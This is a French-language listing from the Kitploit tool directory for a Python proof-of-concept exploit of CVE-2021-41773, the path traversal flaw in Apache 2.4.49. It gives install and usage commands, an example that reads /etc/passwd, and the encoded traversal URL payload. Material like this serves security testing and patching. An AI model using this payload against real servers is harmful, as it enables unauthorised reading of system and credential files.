Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-CVE-2021-41773 — Exploit Python pour CVE-2021-41773 - Vulnérabilité Path Traversal dans Apache HTTP Server 2.4.49 | Kitploit
Outils/GitHubGitHub/blu3ming/poc-cve-2021-41773
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubblu3ming/poc-cve-2021-41773

PoC-CVE-2021-41773

Exploit Python pour CVE-2021-41773 - Vulnérabilité Path Traversal dans Apache HTTP Server 2.4.49

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-41773 Exploit de traversée de chemin sur le serveur Apache HTTP

Un exploit Python pour CVE-2021-41773, une vulnérabilité de traversée de chemin dans Apache HTTP Server 2.4.49 permettant de lire des fichiers arbitraires sur le serveur.

Détails de la vulnérabilité

CVE-2021-41773 est une vulnérabilité de traversée de chemin dans Apache HTTP Server 2.4.49 qui se produit en raison d'une validation incorrecte des chemins fournis par l'utilisateur. La vulnérabilité permet aux attaquants de lire des fichiers en dehors de la racine du document en utilisant des séquences de traversée de chemin encodées en URL.

  • Score CVSS : 7.5 (Élevé)
  • Versions affectées : Apache HTTP Server 2.4.49
  • Vecteur : À distance, non authentifié

Installation

root@kitploit:~
git clone https://github.com/blu3ming/PoC-CVE-2021-41773
cd PoC-CVE-2021-41773
pip install -r requirements.txt

Utilisation

root@kitploit:~
python3 cve-2021-41773.py -t <cible> -f <chemin_fichier>

Paramètres

  • -t, --target : URL cible (inclure le protocole et le port si nécessaire)
  • -f, --file : Chemin du fichier à lire sur le serveur

Exemple

root@kitploit:~
# Lire /etc/passwd
python3 cve-2021-41773.py -t http://192.168.1.100:443 -f /etc/passwd

Successful Exploit

Comment ça fonctionne

L'exploit utilise des séquences de traversée de chemin encodées en URL (.%2e/%2e%2e/) pour contourner la validation de chemin d'Apache :

  1. La version vulnérable d'Apache ne parvient pas à décoder et valider correctement le chemin
  2. Les points encodés en URL (.%2e) contournent les contrôles de sécurité initiaux
  3. Le serveur traite la traversée de chemin après décodage, permettant l'accès aux fichiers

La clé est d'utiliser urllib3.PoolManager() au lieu de requests.get() pour empêcher la normalisation automatique de l'URL qui briserait l'exploit.

Détails techniques

root@kitploit:~
# La structure de l'URL de l'exploit :
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{fichier_cible}

Cela se traduit par :

root@kitploit:~
/cgi-bin/../../../../{fichier_cible}

Références

  • CVE-2021-41773 - MITRE
  • Avis de sécurité d'Apache HTTP Server
  • NVD - CVE-2021-41773
Télécharger l’outil